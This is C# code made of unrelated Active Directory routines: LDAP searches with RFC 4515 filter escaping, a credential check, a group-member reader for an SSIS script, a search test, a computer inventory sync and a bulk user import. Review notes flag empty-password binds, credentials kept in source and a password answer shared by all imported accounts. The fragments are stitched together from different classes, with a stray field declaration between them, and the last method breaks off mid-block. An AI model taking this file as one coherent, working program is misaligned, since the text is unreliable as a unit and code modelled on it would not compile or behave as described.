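/// <summary>
/// Runs an LDAP search against the default search root and returns every value of one
/// attribute as rows of a single-column table named "ADGroups".
/// </summary>
/// <param name="query">LDAP filter; assigned verbatim to <c>DirectorySearcher.Filter</c>.</param>
/// <param name="column">Attribute to read; also the name of the table's only column.</param>
/// <returns>
/// One row per attribute value. A search result that does not carry the attribute
/// contributes a single row whose value is <c>DBNull</c>.
/// </returns>
/// <remarks>
/// The filter is not escaped here. A caller that builds <paramref name="query"/> from user
/// input must escape the value parts first (RFC 4515: <c>\ * ( )</c> and NUL); otherwise the
/// input can rewrite the filter and widen what the search returns.
/// </remarks>
private DataTable RunLDAPQuery(string query, string column)
{
    DataTable dt = new DataTable("ADGroups");
    dt.Columns.Add(column, typeof(string));

    // The searcher and its result collection wrap unmanaged ADSI handles that the garbage
    // collector does not release promptly, so both are disposed deterministically.
    using (DirectorySearcher ds = new DirectorySearcher())
    {
        ds.Filter = query;

        using (SearchResultCollection results = ds.FindAll())
        {
            foreach (SearchResult result in results)
            {
                ResultPropertyValueCollection values = result.Properties[column];

                if (values.Count > 0)
                {
                    // Multi-valued attribute: one row per value.
                    foreach (object value in values)
                    {
                        DataRow dr = dt.NewRow();
                        dr[column] = value;
                        dt.Rows.Add(dr);
                    }
                }
                else
                {
                    // Keep the placeholder row for a result without the attribute, but store
                    // DBNull. Assigning the empty value collection itself to a string column
                    // would store the collection object's string form instead of a value.
                    DataRow dr = dt.NewRow();
                    dr[column] = System.DBNull.Value;
                    dt.Rows.Add(dr);
                }
            }
        }
    }

    return dt;
}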
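int UserId; // For User Id
#endregion Fields

#region Methods

/// <summary>
/// Searches the directory for users whose surname and given name start with the text typed
/// into <c>txtLastName</c> / <c>txtFName</c> and binds mail, first name, last name and
/// display name of each match to <c>grdUserDetails</c>.
/// </summary>
/// <remarks>
/// The two text boxes are untrusted input. Their values are escaped per RFC 4515 before they
/// are placed in the LDAP filter, so characters such as <c>*</c>, <c>(</c> and <c>)</c> are
/// matched literally instead of changing the structure of the filter.
/// Users that lack any of the four attributes are skipped. The grid is only rebound when at
/// least one user was found.
/// </remarks>
public void BindUser()
{
    DataTable DtBindUser = new DataTable();
    DtBindUser.Columns.Add(new DataColumn("mail"));
    DtBindUser.Columns.Add(new DataColumn("fname"));
    DtBindUser.Columns.Add(new DataColumn("lname"));
    DtBindUser.Columns.Add(new DataColumn("displayName"));

    // RFC 4515 escaping of a filter value. The backslash must be replaced first, otherwise
    // the escapes produced by the later replacements would be escaped again.
    System.Func<string, string> escapeFilterValue = value => value
        .Replace("\\", "\\5c")
        .Replace("*", "\\2a")
        .Replace("(", "\\28")
        .Replace(")", "\\29")
        .Replace("\0", "\\00");

    // Connection string configured for Active Directory access.
    string connection = ConfigurationManager.ConnectionStrings["ADConnection"].ToString();

    // NOTE(review): DsSearch is scoped to UserDomain but is never executed. The query below
    // runs on Usersearch, which has no SearchRoot and therefore uses the default root. The
    // single-string DirectorySearcher constructor takes a filter, so "connection" only acts
    // as an initial filter that is overwritten before the search. Confirm which root was
    // intended before relying on the scoping.
    using (DirectoryEntry UserDomain = new DirectoryEntry("LDAP://DC=kpmg,DC=aptaracorp,DC=com"))
    using (DirectorySearcher DsSearch = new DirectorySearcher(connection))
    using (DirectorySearcher Usersearch = new DirectorySearcher(connection))
    {
        DsSearch.SearchRoot = UserDomain;
        DsSearch.SearchScope = SearchScope.Subtree;

        // Prefix match on surname and given name; the trailing '*' is the only wildcard.
        Usersearch.Filter = "(&(objectClass=user)(sn=" + escapeFilterValue(txtLastName.Text)
            + "*)(givenName=" + escapeFilterValue(txtFName.Text) + "*))";

        using (SearchResultCollection UserResult = Usersearch.FindAll())
        {
            foreach (SearchResult hit in UserResult)
            {
                string AccounName = hit.Properties["samaccountname"][0].ToString();

                // The account name comes from the directory, but it is still escaped: it is
                // data, and it must not be able to alter the second filter either.
                using (DirectorySearcher DrSearcher = new System.DirectoryServices.DirectorySearcher(
                    "(samaccountname=" + escapeFilterValue(AccounName) + ")"))
                {
                    SearchResult SrchRes = DrSearcher.FindOne();
                    if (SrchRes == null)
                    {
                        // The account disappeared between the two searches; skip it instead
                        // of failing the whole bind with a null reference.
                        continue;
                    }

                    using (DirectoryEntry DrEntry = SrchRes.GetDirectoryEntry())
                    {
                        try
                        {
                            if (DrEntry.Properties["givenName"][0].ToString() != "")
                            {
                                string FirstName = DrEntry.Properties["givenName"][0].ToString();
                                string LastName = DrEntry.Properties["sn"][0].ToString();
                                string UserEmail = DrEntry.Properties["mail"][0].ToString();
                                string UserDisName = DrEntry.Properties["displayName"][0].ToString();

                                DataRow Druser = DtBindUser.NewRow();
                                Druser["mail"] = UserEmail;
                                Druser["fname"] = FirstName;
                                Druser["lname"] = LastName;
                                Druser["displayName"] = UserDisName;
                                DtBindUser.Rows.Add(Druser);
                            }
                        }
                        catch
                        {
                            // Deliberate best effort: indexing [0] on an attribute the entry
                            // does not have throws, and such users are left out of the grid.
                        }
                    }
                }
            }
        }
    }

    if (DtBindUser.Rows.Count > 0)
    {
        grdUserDetails.DataSource = DtBindUser;
        grdUserDetails.DataBind();
    }
}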
/// <summary>
/// Streams the results of <c>searcher.FindAll()</c> and disposes the underlying
/// <see cref="SearchResultCollection"/> once enumeration is over.
/// </summary>
/// <param name="searcher">Configured searcher to execute.</param>
/// <returns>The search results, yielded one at a time.</returns>
/// <remarks>
/// This is an iterator: the search does not run until the first element is requested, and
/// the collection is released when the caller finishes or disposes the enumeration (a
/// <c>foreach</c> does both).
/// </remarks>
public static IEnumerable<SearchResult> SafeFindAll(DirectorySearcher searcher)
{
    using (SearchResultCollection hits = searcher.FindAll())
    {
        foreach (SearchResult hit in hits)
        {
            yield return hit;
        }
        // Leaving the using block releases the collection's unmanaged handles.
    }
}
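// LDAP verification
/// <summary>
/// Reports whether a search through <paramref name="searcher"/> can be executed, which the
/// caller uses as a check that the credentials configured on the searcher are accepted.
/// </summary>
/// <param name="searcher">Searcher whose search root already carries the credentials to test.</param>
/// <returns><c>true</c> when <c>FindAll()</c> completes; <c>false</c> when it throws.</returns>
/// <remarks>
/// Every exception is reported as <c>false</c>, so an unreachable server or a timeout is
/// indistinguishable from wrong credentials.
/// NOTE(review): the credentials are set by the caller and are not visible here. Callers
/// should reject an empty password before calling, because some directory servers treat an
/// empty-password simple bind as an anonymous bind and let the search succeed.
/// </remarks>
public bool VerifyUser(DirectorySearcher searcher)
{
    try
    {
        // If this call does not throw, the user name and password were accepted.
        // The collection is disposed right away: only the success of the call matters,
        // and an undisposed SearchResultCollection keeps unmanaged handles alive.
        using (SearchResultCollection rs = searcher.FindAll())
        {
            return true;
        }
    }
    catch (Exception)
    {
        return false;
    }
}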
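/// <summary>
/// Checks whether a user object exists whose sAMAccountName or cn equals
/// <paramref name="username"/>.
/// </summary>
/// <param name="username">Name to look up. Treated as untrusted input.</param>
/// <returns><c>true</c> when at least one matching user object is found.</returns>
/// <remarks>
/// The name is escaped per RFC 4515 before it is placed in the filter, so a value such as
/// <c>*</c> or one containing parentheses is matched literally and cannot turn the lookup
/// into a match-anything query.
/// NOTE(review): the bind credentials are literals in source (masked on this page). Load
/// them from protected configuration, or run under a service identity, so they do not live
/// in the repository.
/// </remarks>
public bool UserExists(string username)
{
    // Backslash first, so the escapes added by the later replacements are not re-escaped.
    string escapedName = (username ?? string.Empty)
        .Replace("\\", "\\5c")
        .Replace("*", "\\2a")
        .Replace("(", "\\28")
        .Replace(")", "\\29")
        .Replace("\0", "\\00");

    // The entry is not disposed here because GetDirectoryEntry() is defined elsewhere and
    // may hand out a shared instance - TODO confirm ownership.
    DirectoryEntry de = GetDirectoryEntry();
    de.Username = "******";
    de.Password = "******";

    using (DirectorySearcher deSearch = new DirectorySearcher())
    {
        deSearch.SearchRoot = de;
        deSearch.Filter = "(&(objectClass=user) (|(samaccountname=" + escapedName + ")(cn=" + escapedName + ")))";

        using (SearchResultCollection results = deSearch.FindAll())
        {
            return results.Count > 0;
        }
    }
}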
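/// <summary>
/// Emits one output row per member of the group "IS BI Foundation Team", carrying the
/// member's sAMAccountName in <c>Output0Buffer.User</c>.
/// </summary>
/// <remarks>
/// Members are read from the group's <c>member</c> attribute (distinguished names) and each
/// one is bound as its own entry. Iterating the <c>cn</c> values and passing them to
/// <c>DirectoryEntry(object)</c> could not work: that constructor expects a native ADSI
/// object, not a name string.
/// NOTE(review): a directory server returns only a limited number of values per
/// multi-valued attribute in one read (typically 1,500 on Active Directory), so very large
/// groups may be truncated unless ranged retrieval is added. Nested groups are not expanded.
/// </remarks>
public override void CreateNewOutputRows()
{
    using (DirectorySearcher ADLookup = new DirectorySearcher())
    {
        ADLookup.Filter = "(cn=IS BI Foundation Team)";
        ADLookup.PropertiesToLoad.Add("member");
        ADLookup.PropertiesToLoad.Add("cn");

        using (SearchResultCollection groups = ADLookup.FindAll())
        {
            foreach (SearchResult groupHit in groups)
            {
                foreach (object memberDn in groupHit.Properties["member"])
                {
                    // '/' separates the components of an ADsPath, so a literal '/' inside
                    // the distinguished name has to be escaped before binding.
                    string adsPath = "LDAP://" + memberDn.ToString().Replace("/", "\\/");

                    using (DirectoryEntry user = new DirectoryEntry(adsPath))
                    {
                        // Members such as contacts have no sAMAccountName; skip them rather
                        // than fail on a null value after a row was already added.
                        object accountName = user.Properties["SAMAccountName"].Value;
                        if (accountName == null)
                        {
                            continue;
                        }

                        Output0Buffer.AddRow();
                        Output0Buffer.User = accountName.ToString();
                    }
                }
            }
        }
    }
}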
/// <summary>
/// Builds a small OU tree with two organizationalRole entries below it and checks that
/// <c>DirectorySearcher</c> returns the expected number of entries for a series of filters,
/// and the expected postalCode value for the two single-entry lookups.
/// </summary>
/// <remarks>
/// The "SearchRoot" OU is deleted before the test and again in <c>finally</c>, so a failed
/// run does not leave test objects behind in the directory.
/// </remarks>
public void TestSearch()
{
    using (DirectoryEntry de = CreateRootEntry())
    {
        DeleteOU(de, "SearchRoot");

        try
        {
            using (DirectoryEntry rootOU = CreateOU(de, "SearchRoot", "Root OU"))
            using (DirectoryEntry childOU = CreateOU(rootOU, "Search.Child1", "Root Child 1 OU"))
            using (DirectoryEntry anotherChildOU = CreateOU(rootOU, "Search.Child2", "Root Child 2 OU"))
            using (DirectoryEntry grandChildOU = CreateOU(childOU, "Search.GrandChild", "Grand Child OU"))
            using (DirectoryEntry user1 = CreateOrganizationalRole(grandChildOU, "user.search.grandChild.1", "Grand Child User", "1 111 111 1111"))
            using (DirectoryEntry user2 = CreateOrganizationalRole(grandChildOU, "user.search.grandChild.2", "Grand Child User", "1 222 222 2222"))
            {
                user1.Properties["postalCode"].Value = 98052;
                user1.Properties["postalAddress"].Value = "12345 SE 1st Street, City1, State1";
                user1.CommitChanges();

                user2.Properties["postalCode"].Value = 98088;
                user2.Properties["postalAddress"].Value = "67890 SE 2nd Street, City2, State2";
                user2.CommitChanges();

                using (DirectorySearcher searcher = new DirectorySearcher(rootOU))
                {
                    searcher.ClientTimeout = TimeSpan.FromMinutes(2);

                    // Filter / expected-count pairs, checked in this order.
                    string[] filters =
                    {
                        "(objectClass=organizationalUnit)",
                        "(objectClass=organizationalRole)",
                        "(ou=SearchRoot)",
                        "(ou=Search.Child1)",
                        "(ou=Search.Child2)",
                        "(ou=Search.GrandChild)",
                        "(description=Grand Child OU)",
                        "(description=*)",
                        "(&(description=*)(objectClass=organizationalUnit))",
                        "(&(description=*)(objectClass=organizationalRole))",
                        "(&(description=No Description)(objectClass=organizationalRole))",
                        "(postalCode=*)",
                    };
                    int[] expectedCounts = { 4, 2, 1, 1, 1, 1, 1, 6, 4, 2, 0, 2 };

                    for (int index = 0; index < filters.Length; index++)
                    {
                        searcher.Filter = filters[index];
                        Assert.Equal(expectedCounts[index], searcher.FindAll().Count);
                    }

                    // Each postal code identifies exactly one entry, and FindOne returns it.
                    foreach (string postalCode in new[] { "98052", "98088" })
                    {
                        searcher.Filter = "(postalCode=" + postalCode + ")";
                        Assert.Equal(1, searcher.FindAll().Count);

                        SearchResult hit = searcher.FindOne();
                        Assert.Equal(postalCode, hit.Properties["postalCode"][0]);
                    }
                }
            }
        }
        finally
        {
            DeleteOU(de, "SearchRoot");
        }
    }
}
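/// <summary>
/// Runs one directory search described by a packed argument array and returns the matching
/// entries as <c>ADInfoModel</c> objects.
/// </summary>
/// <param name="obj">
/// An <c>object[]</c> holding, in order: search path (string), schema class names to
/// exclude (List&lt;string&gt;), names to exclude (List&lt;string&gt;), properties to load
/// (List&lt;string&gt;), LDAP filter (string) and the <c>SearchScope</c>.
/// </param>
/// <returns>
/// The entries that passed both exclusion lists, or <c>null</c> when the search failed; the
/// exception is then passed to <c>OnErrorCall</c>.
/// </returns>
/// <remarks>
/// The filter is applied verbatim. Callers that build it from user input must escape the
/// value parts per RFC 4515 first.
/// The caller's property list is copied before the mandatory attributes are appended. The
/// list arrives through a shared argument array, and appending to it in place would change
/// the caller's data and is not safe if the same list is handed to several searches at once.
/// NOTE(review): <c>SizeLimit</c> is raised but <c>PageSize</c> is left at its default, so
/// the server-side result cap presumably still applies and large result sets may come back
/// truncated without an error - confirm against the target directory.
/// </remarks>
private List<ADInfoModel> SearchTask(object obj)
{
    object[] arr = obj as object[];
    string searchPath = arr[0] as string;
    List<string> noSchemaClassName = arr[1] as List<string>;
    List<string> noName = arr[2] as List<string>;
    List<string> requestedProperties = arr[3] as List<string>;
    string filter = arr[4] as string;
    SearchScope searchScope = (SearchScope)arr[5];

    List<ADInfoModel> list = null;

    try
    {
        // Fall back to the root of the configured domain when no path was given.
        string path = string.IsNullOrEmpty(searchPath)
            ? string.Format("LDAP://{0}", this.Domain)
            : searchPath;
        string domainaccount = string.Format("{0}\\{1}", this.Domain, this.Account);

        using (DirectoryEntry entry = new DirectoryEntry(path, domainaccount, this.Password))
        using (DirectorySearcher search = new DirectorySearcher(entry))
        {
            search.SearchScope = searchScope;
            search.Asynchronous = true;
            search.SizeLimit = int.MaxValue;

            if (!string.IsNullOrEmpty(filter))
            {
                search.Filter = filter;
            }

            if (requestedProperties != null && requestedProperties.Count > 0)
            {
                // Private copy: the attributes below are added to it, not to the caller's list.
                List<string> propertiesToLoad = new List<string>(requestedProperties);

                foreach (string required in new[] { "name", "objectclass", "objectguid", "adspath" })
                {
                    if (!propertiesToLoad.Contains(required, StringComparer.OrdinalIgnoreCase))
                    {
                        propertiesToLoad.Add(required);
                    }
                }

                search.PropertiesToLoad.AddRange(propertiesToLoad.ToArray());
            }

            using (var all = search.FindAll())
            {
                list = new List<ADInfoModel>(all.Count);

                foreach (SearchResult searchResult in all)
                {
                    var info = Get(searchResult);
                    if (info == null)
                    {
                        continue;
                    }

                    bool schemaExcluded = noSchemaClassName != null
                        && noSchemaClassName.Contains(info.SchemaClassName, StringComparer.OrdinalIgnoreCase);
                    bool nameExcluded = noName != null
                        && noName.Contains(info.Name, StringComparer.OrdinalIgnoreCase);

                    if (!schemaExcluded && !nameExcluded)
                    {
                        list.Add(info);
                    }
                }
            }
        }
    }
    catch (Exception ex)
    {
        // Errors are reported through the callback; the caller sees them as a null
        // (or partially filled) list.
        this.OnErrorCall(ex);
    }

    return list;
}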
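/// <summary>
/// Walks the children of <paramref name="directory"/> and mirrors every organizational
/// unit, container and group into <paramref name="root"/>.Childrens, recursing into
/// organizational units and containers.
/// </summary>
/// <param name="root">Node that receives the discovered children.</param>
/// <param name="directory">Directory entry whose children are enumerated.</param>
/// <remarks>
/// Organizational units and containers are only kept when at least one group exists below
/// them. A child is not added twice: entries with the same name and description as an
/// existing child are skipped.
/// The existence check uses <c>FindOne()</c> inside a <c>using</c> block. Counting a full
/// <c>FindAll()</c> just to test for "any" reads every group in the subtree and leaves the
/// searcher and its result collection undisposed on every iteration.
/// NOTE(review): member names are taken as the text before the first ',' of each member DN.
/// A common name that contains an escaped comma ("Doe\, John") is cut short by this - confirm
/// whether such names occur.
/// </remarks>
private static void EnumerateGroups(DomainInformation root, DirectoryEntry directory)
{
    foreach (DirectoryEntry child in directory.Children)
    {
        string schemaClass = child.SchemaClassName;
        bool isGroup = schemaClass == "group";

        if (!isGroup && schemaClass != "organizationalUnit" && schemaClass != "container")
        {
            continue;
        }

        if (!isGroup)
        {
            // A group is always kept, so only OUs and containers need the lookup.
            using (DirectorySearcher mySearcher = new DirectorySearcher(child) { Filter = "(objectClass=group)" })
            {
                if (mySearcher.FindOne() == null)
                {
                    continue;
                }
            }
        }

        object rawDescription = child.Properties["description"].Value;
        string description = rawDescription != null ? rawDescription.ToString() : string.Empty;

        DomainInformation item;
        switch (schemaClass)
        {
            case "organizationalUnit":
                item = new DomainInformation()
                {
                    Type = DomainInformationTypeEnum.OrganizationUnit,
                    Name = child.Name.Replace("OU=", ""),
                    Description = description
                };
                break;

            case "container":
                item = new DomainInformation()
                {
                    Type = DomainInformationTypeEnum.OrganizationUnit,
                    Name = child.Name.Replace("CN=", ""),
                    Description = description
                };
                break;

            default: // "group"
                item = new DomainInformation()
                {
                    Type = DomainInformationTypeEnum.Group,
                    Name = child.Name.Replace("CN=", ""),
                    Description = description,
                    Info = ParseGroupInfo(child)
                };
                break;
        }

        if (root.Childrens.Any(x => x.Name == item.Name && x.Description == item.Description))
        {
            continue;
        }

        if (isGroup)
        {
            if (child.Properties["member"] != null)
            {
                var groupInfo = item.Info as ActiveDirectoryGroupInfo;
                foreach (var member in child.Properties["member"])
                {
                    // First RDN of the member DN, without its "CN=" prefix.
                    groupInfo.Members.Add(member.ToString().Split(',')[0].Replace("CN=", ""));
                }
            }

            root.Childrens.Add(item);
        }
        else
        {
            root.Childrens.Add(item);
            EnumerateGroups(item, child);
        }
    }
}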
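/// <summary>
/// Synchronizes the local computer inventory with Active Directory: archives AD-synced
/// computers that no longer appear in the directory, then creates or updates a record for
/// every enabled and every disabled non-server computer account.
/// </summary>
/// <remarks>
/// Archiving only runs when the directory returned at least one computer, so an empty
/// answer does not wipe the inventory.
/// NOTE(review): a partial answer (for example a search that was cut short) still passes
/// that guard and would archive every computer missing from it - consider an additional
/// sanity threshold before archiving.
/// </remarks>
private void SyncComputers()
{
    Logger.Debug("Synchronizing Computers From Active Directory");

    // Enabled computers, servers excluded. The bitwise-AND matching rule tests the
    // "account disabled" bit (2) of userAccountControl.
    var enabledCompDict = FindAdComputers("(&(objectCategory=Computer)(!userAccountControl:1.2.840.113556.1.4.803:=2)(!operatingSystem=*server*))");

    // Disabled computers, servers excluded.
    var disabledCompDict = FindAdComputers("(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=2)(!operatingSystem=*server*))");

    // Names currently present in the directory. A set gives constant-time lookups while
    // comparing against the stored computers; scanning a dictionary by value for every
    // stored computer is quadratic.
    var adNames = new HashSet<string>(disabledCompDict.Values);
    adNames.UnionWith(enabledCompDict.Values);

    if (adNames.Count > 0)
    {
        var currentAdComputers = _computerService.GetAllAdComputers();
        var toArchive = currentAdComputers
            .Where(adComputer => !adNames.Contains(adComputer.Name))
            .Select(adComputer => adComputer.Id)
            .ToList();

        foreach (var compId in toArchive)
        {
            _computerService.ArchiveComputer(compId);
        }
    }

    UpsertAdComputers(enabledCompDict, false);
    UpsertAdComputers(disabledCompDict, true);
}

/// <summary>
/// Runs one paged computer search and returns distinguishedName mapped to upper-cased cn.
/// </summary>
private Dictionary<string, string> FindAdComputers(string filter)
{
    var found = new Dictionary<string, string>();

    using (DirectoryEntry entry = InitializeEntry())
    using (DirectorySearcher searcher = new DirectorySearcher(entry))
    {
        searcher.Filter = filter;
        searcher.PropertiesToLoad.Add("cn");
        searcher.PropertiesToLoad.Add("distinguishedName");
        searcher.SizeLimit = 0;
        searcher.PageSize = 500;

        // Dispose the result collection explicitly; iterating FindAll() directly in a
        // foreach leaves its unmanaged handles to the finalizer.
        using (SearchResultCollection results = searcher.FindAll())
        {
            foreach (SearchResult res in results)
            {
                found.Add((string)res.Properties["distinguishedName"][0], ((string)res.Properties["cn"][0]).ToUpper());
            }
        }
    }

    return found;
}

/// <summary>
/// Creates or updates the local record of each directory computer and refreshes its
/// membership list, storing <paramref name="adDisabled"/> as the record's disabled state.
/// </summary>
private void UpsertAdComputers(Dictionary<string, string> computers, bool adDisabled)
{
    foreach (var comp in computers)
    {
        var existing = _computerService.GetByName(comp.Value);

        if (existing == null)
        {
            var computerEntity = new EntityComputer();
            computerEntity.Name = comp.Value;
            computerEntity.IsAdSync = true;
            computerEntity.AdDisabled = adDisabled;
            computerEntity.ProvisionStatus = EnumProvisionStatus.Status.PreProvisioned;
            computerEntity.CertificateId = -1;

            var addResult = _computerService.AddComputer(computerEntity);
            if (addResult == null)
            {
                continue;
            }

            if (addResult.Success)
            {
                CreateMembershipList(computerEntity, comp.Key);
            }
        }
        else
        {
            // Only write when the record is not yet AD-synced or its disabled state differs.
            if (!existing.IsAdSync || existing.AdDisabled != adDisabled)
            {
                existing.IsAdSync = true;
                existing.AdDisabled = adDisabled;
                _computerService.UpdateComputer(existing);
            }

            CreateMembershipList(existing, comp.Key);
        }
    }
}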
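/// <summary>
/// Imports every person/user object of the domain typed into <c>txtDomainName</c> into the
/// application: a login row, a contact row, a membership account with a generated password,
/// and the basic user role. Shows a status message in <c>lblErrMsg</c> afterwards.
/// </summary>
/// <param name="sender">Event source (unused).</param>
/// <param name="e">Event data (unused).</param>
/// <remarks>
/// Security-relevant points for review:
/// - The domain name is user input and decides which server receives the typed user name
///   and password. NOTE(review): restrict it to the expected domain(s).
/// - Every imported account is created with the same password question and answer
///   ("Project Name" / "Helpdesk"). If the membership provider allows question-and-answer
///   password reset or retrieval, that answer is known for every account.
/// - NOTE(review): the generated password is also handed to <c>objUserLogin</c>; confirm
///   that <c>Insert()</c> does not persist it in clear text.
/// - The role is only assigned after the membership account was actually created.
/// - NOTE(review): no <c>PageSize</c> is set, so the server-side result cap presumably
///   limits how many users one import can see - confirm for large domains.
/// </remarks>
protected void btnImport_Click(object sender, EventArgs e)
{
    try
    {
        string Username = txtUserName.Text;
        string Password = txtPassword.Text;

        // Domain name as typed by the operator.
        string varObjDomainName = txtDomainName.Text.ToString().Trim();

        // Both directory objects wrap unmanaged handles and are disposed when the import ends.
        using (DirectoryEntry myDirectoryEntry = new DirectoryEntry(String.Format("LDAP://{0}", varObjDomainName)))
        {
            myDirectoryEntry.Username = Username;
            myDirectoryEntry.Password = Password;

            using (DirectorySearcher mySearcher = new DirectorySearcher(myDirectoryEntry))
            {
                mySearcher.Filter = "(&(objectClass=user)(objectCategory=person))";

                // Organization the imported users are attached to.
                objOrg = objOrg.Get_Organization();
                int OrganizationId = objOrg.Orgid;

                // Role given to every imported user, taken from the global resource file.
                string varRoleName = Resources.MessageResource.BasicUserRole.ToString();
                int varRoleid = objRoleInfo.Get_By_RoleName(varRoleName);

                // FlagSave: at least one user was stored. FlagUserExist: at least one user
                // was already present.
                int FlagSave = 0;
                int FlagUserExist = 0;

                using (SearchResultCollection results = mySearcher.FindAll())
                {
                    foreach (SearchResult result in results)
                    {
                        try
                        {
                            string SAMAccountName = result.Properties["sAMAccountName"].Count > 0 ? result.Properties["sAMAccountName"][0].ToString() : "";
                            string DisplayName = result.Properties["displayName"].Count > 0 ? result.Properties["displayName"][0].ToString() : "";
                            string mail = result.Properties["mail"].Count > 0 ? result.Properties["mail"][0].ToString() : "";

                            string varUserName = SAMAccountName.Trim();

                            // Zero means the user does not exist in the database yet.
                            int FlagStatus = objUserLogin.Get_By_UserName(varUserName, OrganizationId);

                            if (FlagStatus != 0)
                            {
                                FlagUserExist = 1;
                                continue;
                            }

                            string VarPassword = Membership.GeneratePassword(8, 2);

                            objUserLogin.ADEnable = true;
                            objUserLogin.Createdatetime = DateTime.Now.ToString();
                            objUserLogin.Enable = true;
                            objUserLogin.Orgid = OrganizationId;
                            objUserLogin.Password = VarPassword;
                            objUserLogin.Username = varUserName;
                            objUserLogin.Roleid = varRoleid;
                            objUserLogin.DomainName = varObjDomainName;

                            // 1 means the login row was inserted.
                            int FlagInsertStatus = objUserLogin.Insert();
                            if (FlagInsertStatus != 1)
                            {
                                continue;
                            }

                            // First and second word of the display name become first and last name.
                            string[] varFullName = DisplayName.Split(' ');
                            string varFirstName = varFullName[0].Trim();
                            string varLastName = "";
                            if (varFullName.Length > 1)
                            {
                                varLastName = varFullName[1].Trim();
                            }

                            // Id of the login row that was just created.
                            int UserId = objUserLogin.Get_By_UserName(varUserName, OrganizationId);

                            objContactInfo.Userid = UserId;
                            objContactInfo.Emailid = mail;
                            objContactInfo.Firstname = varFirstName;
                            objContactInfo.Lastname = varLastName;

                            int FlagContactInfo = objContactInfo.Insert();
                            if (FlagContactInfo == 0)
                            {
                                // Contact row failed: remove the login row again.
                                objUserLogin.Delete(UserId);
                                continue;
                            }

                            FlagSave = 1;

                            string varEmail;
                            if (mail == "")
                            {
                                varEmail = Resources.MessageResource.errMemshipCreateUserEmail.ToString();
                            }
                            else
                            {
                                varEmail = mail.Trim();
                            }

                            MembershipCreateStatus Mstatus;
                            Membership.CreateUser(varUserName, VarPassword.Trim(), varEmail, "Project Name", "Helpdesk", true, out Mstatus);

                            // Assign the role only when the membership account exists.
                            // NOTE(review): on any other status the login and contact rows
                            // stay in the database without a membership account - decide
                            // whether they should be rolled back.
                            if (Mstatus == MembershipCreateStatus.Success)
                            {
                                Roles.AddUserToRole(varUserName, varRoleName);
                            }
                        }
                        catch
                        {
                            // Deliberate best effort: a failure on one directory user must
                            // not stop the import of the remaining users. The failure is not
                            // recorded anywhere.
                        }
                    }
                }

                if (FlagSave == 1)
                {
                    // Messages come from the MessageResource file in App_GlobalResources.
                    lblErrMsg.Text = Resources.MessageResource.errDataSave.ToString();
                }
                else if (FlagUserExist == 1)
                {
                    lblErrMsg.Text = Resources.MessageResource.errUserDomainExist.ToString();
                }
                else
                {
                    lblErrMsg.Text = Resources.MessageResource.errOccured.ToString();
                }
            }
        }
    }
    catch (Exception)
    {
        // Any failure outside the per-user loop is reported as a domain name problem.
        lblErrMsg.Text = Resources.MessageResource.errDomainName.ToString();
    }

    Dispose();
}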
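/// <summary>
/// Reads all enabled person/user objects below the configured directory URL and maps them
/// to <c>ADUser</c> objects.
/// </summary>
/// <returns>
/// The users that have a valid UUID, match the optional sAMAccountName prefix and do not
/// live below one of the ignored OUs.
/// </returns>
/// <remarks>
/// The UUID comes from the configured custom attribute when one is set, otherwise from
/// objectGUID. Users without a parsable UUID are skipped with a warning.
/// Identifier comparisons are ordinal: the account-name prefix is matched case-sensitively
/// and the OU suffix case-insensitively, independent of the current culture. The OU entry
/// is trimmed before it is compared, matching the blank-entry check.
/// NOTE(review): the Cpr value is presumably a personal identification number. The log
/// messages in this method contain only the account name and the UUID; keep it that way.
/// </remarks>
public List<ADUser> ReadUsers()
{
    List<ADUser> users = new List<ADUser>();
    var settings = Properties.Settings.Default;

    using (DirectoryEntry startingPoint = new DirectoryEntry(settings.ADUrl))
    using (DirectorySearcher searcher = new DirectorySearcher(startingPoint))
    {
        searcher.PageSize = 500;

        // Enabled accounts only: the bitwise-AND rule excludes the "account disabled" bit (2).
        searcher.Filter = "(&(objectClass=user)(objectCategory=person)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))";
        searcher.PropertiesToLoad.Add(settings.UserTitleField);
        searcher.PropertiesToLoad.Add("objectGUID");
        searcher.PropertiesToLoad.Add(settings.UserNameField);
        searcher.PropertiesToLoad.Add("distinguishedname");
        searcher.PropertiesToLoad.Add("sAMAccountName");

        if (!string.IsNullOrEmpty(settings.CustomUUIDField))
        {
            searcher.PropertiesToLoad.Add(settings.CustomUUIDField);
        }

        if (!string.IsNullOrEmpty(settings.UserEmailField))
        {
            searcher.PropertiesToLoad.Add(settings.UserEmailField);
        }

        if (!string.IsNullOrEmpty(settings.UserCprField))
        {
            searcher.PropertiesToLoad.Add(settings.UserCprField);
        }

        using (var resultSet = searcher.FindAll())
        {
            foreach (SearchResult res in resultSet)
            {
                string uuid = null;
                if (!string.IsNullOrEmpty(settings.CustomUUIDField))
                {
                    if (res.Properties.Contains(settings.CustomUUIDField))
                    {
                        uuid = (string)res.Properties[settings.CustomUUIDField][0];
                    }
                }
                else
                {
                    Guid guid = new Guid((byte[])res.Properties["objectGUID"][0]);
                    uuid = guid.ToString().ToLowerInvariant();
                }

                string dn = (string)res.Properties["distinguishedname"][0];
                string name = (string)res.Properties[settings.UserNameField][0];
                string userId = (string)res.Properties["sAMAccountName"][0];

                string title = settings.DefaultTitle;
                if (res.Properties.Contains(settings.UserTitleField))
                {
                    title = (string)res.Properties[settings.UserTitleField][0];
                }

                string email = null;
                if (res.Properties.Contains(settings.UserEmailField))
                {
                    email = (string)res.Properties[settings.UserEmailField][0];
                }

                string cpr = null;
                if (res.Properties.Contains(settings.UserCprField))
                {
                    // Accept the value with or without dashes; anything that is not ten
                    // characters long afterwards is dropped.
                    cpr = ((string)res.Properties[settings.UserCprField][0]).Replace("-", "");
                    if (cpr.Length != 10)
                    {
                        cpr = null;
                    }
                }

                if (string.IsNullOrEmpty(uuid))
                {
                    log.Warn("User " + userId + " did not have a uuid in attribute '" + settings.CustomUUIDField + "'");
                    continue;
                }

                Guid parsedUuid;
                if (!Guid.TryParse(uuid, out parsedUuid))
                {
                    log.Warn("User " + userId + " did not have a uuid in attribute '" + settings.CustomUUIDField + "'. Invalid value: " + uuid);
                    continue;
                }

                if (!string.IsNullOrEmpty(SAMAccountPrefix) && !userId.StartsWith(SAMAccountPrefix, StringComparison.Ordinal))
                {
                    continue;
                }

                bool inIgnoredOu = false;
                foreach (string ouToIgnore in ousToIgnore)
                {
                    string suffix = ouToIgnore.Trim();
                    if (suffix.Length == 0)
                    {
                        continue;
                    }

                    if (dn.EndsWith(suffix, StringComparison.OrdinalIgnoreCase))
                    {
                        inIgnoredOu = true;
                        break;
                    }
                }

                if (inIgnoredOu)
                {
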